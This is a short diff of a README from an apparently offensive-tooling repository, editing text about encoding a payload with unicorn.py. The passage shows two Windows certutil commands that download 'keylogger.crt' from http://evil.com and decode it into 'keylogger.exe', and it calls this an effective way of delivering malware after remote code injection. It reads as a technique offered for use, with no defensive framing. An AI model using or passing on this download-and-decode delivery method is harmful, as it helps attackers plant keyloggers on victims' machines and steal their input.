NullArray/Archivist/Beta/README.md

 `python unicorn.py <path_to_payload/exe_encode> crt`

-The beauty of this is that the `certutil` on Windows can be used to both download and restore such files back to `exe`.
+The beauty of this is that the `certutil` tool on Windows can be used to both download and restore the encoded files back to `exe`.
 If you're able to run:

 ```
 certutil -urlcache -split -f http://evil.com/keylogger.crt keylogger.crt
 certutil -decode keylogger.crt keylogger.exe
 ```

-Through remote code injection, or what have you.
+Through remote code injection, or your preferred vector.
 That would be a pretty effective way of delivering the malware.